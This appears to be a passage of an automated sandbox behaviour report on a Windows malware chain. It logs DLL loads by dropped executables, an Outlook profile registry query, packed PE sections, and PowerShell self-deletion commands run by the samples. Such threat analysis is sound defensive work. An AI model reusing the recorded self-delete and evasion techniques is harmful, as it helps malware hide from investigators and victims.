                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: dlnashext.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: wpdshext.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: apphelp.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: sspicli.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: wininet.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: rstrtmgr.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: ncrypt.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: ntasn1.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: dbghelp.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: iertutil.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: windows.storage.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: wldp.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: profapi.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: kernel.appcore.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: winhttp.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: mswsock.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: iphlpapi.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: winnsi.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: urlmon.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: srvcli.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: netutils.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: dnsapi.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: rasadhlp.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: fwpuclnt.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: schannel.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: mskeyprotect.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: msasn1.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: dpapi.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: cryptsp.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: rsaenh.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: cryptbase.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: gpapi.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: ncryptsslp.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: ntmarta.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: uxtheme.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: windowscodecs.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: propsys.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: windows.fileexplorer.common.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: ntshrui.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: cscapi.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: linkinfo.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: edputil.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: wintypes.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: appresolver.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: bcp47langs.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: slc.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: userenv.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: sppc.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: pcacli.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: mpr.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: sfc_os.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: mscoree.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: kernel.appcore.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: version.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: uxtheme.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: cryptsp.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: rsaenh.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: cryptbase.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: dwrite.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: msvcp140_clr0400.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: windows.storage.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: wldp.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: profapi.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: windows.applicationmodel.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: twinapi.appcore.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: wintypes.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: windows.globalization.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: bcp47langs.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: bcp47mrm.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: dwmapi.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: d3d9.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: d3d10warp.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: urlmon.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: iertutil.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: srvcli.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: netutils.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: windowscodecs.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: msasn1.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: msisip.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: wshext.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: appxsip.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: opcservices.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: esdsip.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: ncrypt.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: ntasn1.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: ncrypt.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: ntasn1.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: ncryptprov.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: wtsapi32.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: winsta.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: powrprof.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: umpdc.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: dataexchange.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: d3d11.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: dcomp.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: dxgi.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: textshaping.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: dxcore.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: winmm.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: textinputframework.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: coreuicomponents.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: coremessaging.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: ntmarta.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: coremessaging.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: msctfui.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: uiautomationcore.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: propsys.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: windows.web.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: d3dcompiler_47.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: wininet.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: sspicli.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: rasapi32.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: rasman.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: rtutils.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: mswsock.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: winhttp.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: iphlpapi.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: dhcpcsvc.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: winnsi.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: dnsapi.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: rasadhlp.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: fwpuclnt.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: secur32.dll
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                      Source: file.exeStatic file information: File size 2989568 > 1048576
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: file.exeStatic PE information: Raw size of uyzzfcwd is bigger than: 0x100000 < 0x2a8400
                      Source: Binary string: D:\a\_work\1\s\src\StoreInstaller\obj\Release\net472\StoreInstaller.pdb source: 4268204ace.exe, 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2742198429.0000000003CBA000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000000.2721445578.00000220D3472000.00000002.00000001.01000000.00000014.sdmp
                      Source: Binary string: D:\a\_work\1\s\src\StoreInstaller\obj\Release\net472\StoreInstaller.pdbSHA256\u source: 4268204ace.exe, 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2742198429.0000000003CBA000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000000.2721445578.00000220D3472000.00000002.00000001.01000000.00000014.sdmp
                      Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdb source: 4268204ace.exe, 0000000F.00000000.2555729362.00000000007D2000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdbdj~j pj_CorExeMainmscoree.dll source: 4268204ace.exe, 0000000F.00000000.2555729362.00000000007D2000.00000002.00000001.01000000.0000000C.sdmp

                      Data Obfuscation

                      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.50000.0.unpack :EW;.rsrc:W;.idata :W;uyzzfcwd:EW;cnrltnzy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;uyzzfcwd:EW;cnrltnzy:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 1.2.skotes.exe.6f0000.0.unpack :EW;.rsrc:W;.idata :W;uyzzfcwd:EW;cnrltnzy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;uyzzfcwd:EW;cnrltnzy:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeUnpacked PE file: 57.2.77594b3442.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ztykcjub:EW;rrqhotlr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ztykcjub:EW;rrqhotlr:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                      Source: random[1].exe0.5.drStatic PE information: 0x94370F66 [Sun Oct 18 12:19:50 2048 UTC]
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_002166A8 GetCurrentProcess,GetProcessTimes,memset,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,fputs,11_2_002166A8
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                      Source: random[1].exe1.5.drStatic PE information: real checksum: 0x447b07 should be: 0x449f2f
                      Source: 7z.exe.7.drStatic PE information: real checksum: 0x0 should be: 0x7b29e
                      Source: random[2].exe0.5.drStatic PE information: real checksum: 0x1c072f should be: 0x1c1af0
                      Source: random[4].exe1.5.drStatic PE information: real checksum: 0x44d56e should be: 0x44fdb5
                      Source: random[4].exe.5.drStatic PE information: real checksum: 0xd9d82 should be: 0xdfd9a
                      Source: 5119130eb96345a8a13dc770d0f33571.exe.15.drStatic PE information: real checksum: 0x10c5c5 should be: 0x10b49f
                      Source: 9c2981f3e5.exe.5.drStatic PE information: real checksum: 0x447b07 should be: 0x449f2f
                      Source: d7884c562e.exe.5.drStatic PE information: real checksum: 0x44d56e should be: 0x44fdb5
                      Source: 7d28d37061cb43098969a37cf25a380a.exe.15.drStatic PE information: real checksum: 0x0 should be: 0x243ba
                      Source: random[3].exe0.5.drStatic PE information: real checksum: 0x0 should be: 0xc8597
                      Source: random[5].exe.5.drStatic PE information: real checksum: 0x1a555c should be: 0x15e8ab
                      Source: 513dad5c05.exe.5.drStatic PE information: real checksum: 0x2c742a should be: 0x2c4365
                      Source: 77594b3442.exe.5.drStatic PE information: real checksum: 0x1c072f should be: 0x1c1af0
                      Source: random[2].exe1.5.drStatic PE information: real checksum: 0x2bf0ab should be: 0x2c12d9
                      Source: 73c096c84a.exe.5.drStatic PE information: real checksum: 0x1a555c should be: 0x15e8ab
                      Source: skotes.exe.0.drStatic PE information: real checksum: 0x2e5189 should be: 0x2e3bb7
                      Source: 964c9facda.exe.5.drStatic PE information: real checksum: 0x1cfc32 should be: 0x1d33c1
                      Source: random[4].exe0.5.drStatic PE information: real checksum: 0x0 should be: 0x11353a
                      Source: 7z.dll.7.drStatic PE information: real checksum: 0x0 should be: 0x1a2c6b
                      Source: random[1].exe2.5.drStatic PE information: real checksum: 0x1da207 should be: 0x1cc4a9
                      Source: 4268204ace.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x14b59
                      Source: 164919d456.exe.5.drStatic PE information: real checksum: 0x0 should be: 0xc8597
                      Source: fcd2b0e3cd.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x11353a
                      Source: 0577f55121.exe.5.drStatic PE information: real checksum: 0x1da207 should be: 0x1cc4a9
                      Source: ce29828af5.exe.5.drStatic PE information: real checksum: 0x2bf0ab should be: 0x2c12d9
                      Source: file.exeStatic PE information: real checksum: 0x2e5189 should be: 0x2e3bb7
                      Source: random[3].exe.5.drStatic PE information: real checksum: 0x1cfc32 should be: 0x1d33c1
                      Source: random[2].exe2.5.drStatic PE information: real checksum: 0x2c742a should be: 0x2c4365
                      Source: random[1].exe0.5.drStatic PE information: real checksum: 0x0 should be: 0x14b59
                      Source: 9905c00c72.exe.5.drStatic PE information: real checksum: 0xd9d82 should be: 0xdfd9a
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name: .idata
                      Source: file.exeStatic PE information: section name: uyzzfcwd
                      Source: file.exeStatic PE information: section name: cnrltnzy
                      Source: file.exeStatic PE information: section name: .taggant
                      Source: skotes.exe.0.drStatic PE information: section name:
                      Source: skotes.exe.0.drStatic PE information: section name: .idata
                      Source: skotes.exe.0.drStatic PE information: section name: uyzzfcwd
                      Source: skotes.exe.0.drStatic PE information: section name: cnrltnzy
                      Source: skotes.exe.0.drStatic PE information: section name: .taggant
                      Source: 513dad5c05.exe.5.drStatic PE information: section name:
                      Source: 513dad5c05.exe.5.drStatic PE information: section name: .idata
                      Source: 513dad5c05.exe.5.drStatic PE information: section name: ifvqdref
                      Source: 513dad5c05.exe.5.drStatic PE information: section name: ulfvmwmt
                      Source: 513dad5c05.exe.5.drStatic PE information: section name: .taggant
                      Source: ce29828af5.exe.5.drStatic PE information: section name:
                      Source: ce29828af5.exe.5.drStatic PE information: section name: .idata
                      Source: ce29828af5.exe.5.drStatic PE information: section name: kiohytmd
                      Source: ce29828af5.exe.5.drStatic PE information: section name: gbzfitgk
                      Source: ce29828af5.exe.5.drStatic PE information: section name: .taggant
                      Source: random[3].exe.5.drStatic PE information: section name:
                      Source: random[3].exe.5.drStatic PE information: section name: .idata
                      Source: random[3].exe.5.drStatic PE information: section name:
                      Source: random[3].exe.5.drStatic PE information: section name: lzigcvvj
                      Source: random[3].exe.5.drStatic PE information: section name: pdsqmwos
                      Source: random[3].exe.5.drStatic PE information: section name: .taggant
                      Source: 964c9facda.exe.5.drStatic PE information: section name:
                      Source: 964c9facda.exe.5.drStatic PE information: section name: .idata
                      Source: 964c9facda.exe.5.drStatic PE information: section name:
                      Source: 964c9facda.exe.5.drStatic PE information: section name: lzigcvvj
                      Source: 964c9facda.exe.5.drStatic PE information: section name: pdsqmwos
                      Source: 964c9facda.exe.5.drStatic PE information: section name: .taggant
                      Source: random[4].exe1.5.drStatic PE information: section name:
                      Source: random[4].exe1.5.drStatic PE information: section name: .idata
                      Source: random[4].exe1.5.drStatic PE information: section name:
                      Source: random[4].exe1.5.drStatic PE information: section name: odlbdsvw
                      Source: random[4].exe1.5.drStatic PE information: section name: ivvnrpag
                      Source: random[4].exe1.5.drStatic PE information: section name: .taggant
                      Source: random[1].exe1.5.drStatic PE information: section name:
                      Source: random[1].exe1.5.drStatic PE information: section name: .idata
                      Source: random[1].exe1.5.drStatic PE information: section name:
                      Source: random[1].exe1.5.drStatic PE information: section name: hdwdyvma
                      Source: random[1].exe1.5.drStatic PE information: section name: sgdtbgtm
                      Source: random[1].exe1.5.drStatic PE information: section name: .taggant
                      Source: 9c2981f3e5.exe.5.drStatic PE information: section name:
                      Source: 9c2981f3e5.exe.5.drStatic PE information: section name: .idata
                      Source: 9c2981f3e5.exe.5.drStatic PE information: section name:
                      Source: 9c2981f3e5.exe.5.drStatic PE information: section name: hdwdyvma
